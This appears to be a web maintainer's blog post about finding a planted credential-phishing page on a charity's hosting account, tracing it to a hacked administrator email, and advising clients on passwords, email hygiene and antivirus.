Hacked Email Account

I routinely go through all sites four times a year, depending on how active you are on your site it might be more frequently than that.

While downloading the backup files from one site my Anti Virus scanner stopped me from downloading one of the files. It had detected something in the file.

I turned my AV off (not recommended) so I could download the file and examine it.  What I found was a Phishing trojan on this website. It had been added to the site and was not on the site in an earlier backup I had done 3 months ago.

The question was, how did it get there?

Getting back on line

The first problem though was to back up the site, clean out the hosting, and place fresh code into the site and only restore the content part of the website. Change all of the passwords and force any logged in users to log out and reset security. It took around 7 hours to find out what it was, how it worked, and then explore the various ways it may have got there.  I naturally have to assume that my systems may have been compromised too, so I have to reset all of those and review security, so the whole thing is a massive pain. I also routinely raise it with the hosting company as well.

Returning to the question

The WordPress website itself was not hacked in this case. There was no evidence of any of the files being edited, although I did discard everything and rebuilt the site. The hosting was compromised, so someone had placed some files into the hosting.

They appeared to be totally isolated meaning that it was unclear how someone on the legitimate site may end up going to this single page. I am speculating that the page was referenced from other sites. The hacker in this case presented a screen inviting the victim to enter their email address and password to download a file. When the victim enters their email address and password, this, along with other information was emailed to the hackers who used anonymous GMail accounts. It used the hosting to display the page, and to send the email to the two gmail addresses. This is called Phishing and is a form of identity theft.

This is the Phishing Trojan page that was hidden in this website


We are still unclear how it got there, however the most likely way was through a hacked email account. The control panel details were sent to this organisation some time ago. If those details sat in the email box, and if that email box was online, then it is conceivable that someone could read them and use them.

It was later confirmed that the administrators email account was hacked in November. If this happens to you, do let me know immediately. I can reset some parameters on the website very quickly. It may save me hours if something does go wrong!

Security of information

If you are using a public free email provider such as hotmail, yahoo, or gmail please do not leave anything sensitive in your email folders if they are online.

Also consider turning on additional methods of authentication to prevent your email account from being hijacked.

Keep it tough!

People share passwords with me from time to time while I access accounts on their behalf, and invariably the passwords are very simple. The ones I give to you are very complex.  If you are sent password details by email then you need to consider the following points:

  • Remove the mail from your email system, store the information independently in a file and delete the email.
  • Do not leave it in an online (web accessible) email account.
  • Consider changing the password to something else, but keep it complex, do not simplify it.
  • If you have shared your account details with me (for example for the purposes of moving a site), then when I tell you I have completed the move change the password immediately. You need to remain in control at all times.
  • If you have shared the cPanel account details with your “IT Partners” because they were setting up email accounts for you, when they have finished working on the site change it to something else. You need to remain in control at all times.

Anti Virus

I raised some questions about anti virus protection at this charity. It turns out that they were using free anti virus programs. I do not recommend taking short cuts with security. I have had to deal with around 5 cases now where a good quality anti virus program may have prevented something from being downloaded and installed on a computer. You can get large discounts from providers such as Eset.com for products if you are a registered charity. These programs not only check for viruses but also provide a firewall around your computer.

It is also worth considering in this case that my AV detected this file in a zipped up download. The file was harmless provided it was not sitting on a web server. I use ESET Smart Security. I have done so for 15 yrs for this reason.

Trust me I am a doctor

I also got into a protracted debate with a representative of the IT company for this charity over email. I will not go into the details here, however it is worth considering if you are using an external company to look after your systems, as was the case here, why was a free Anti Virus program being used or recommended?

The attitude of this individual was very defensive. Claiming a large number of other ways that this may have happened. All of which are well documented and covered on your sites from day one. He failed to register the point that a problem had occurred and that the most important thing was to prevent it from happening again.

If you have placed the management of your IT into someone else’s hands do check that you have adequate protection. I have seen an increasing number of cases where PCs have not been protected, and trojan viruses and other malware have been accidentally downloaded and installed on a computer. It is not the fault of the user. These things are increasingly more devious in how they get onto computers.

There are examples where a PC has been compromised in a small business, and over a weekend their entire systems were erased (because it was a supervisors PC). On the Monday morning the office came in to find a ransom note appeared on the screen asking them to ring a mobile phone number if they wanted to get their data back.

Don’t let this happen to you.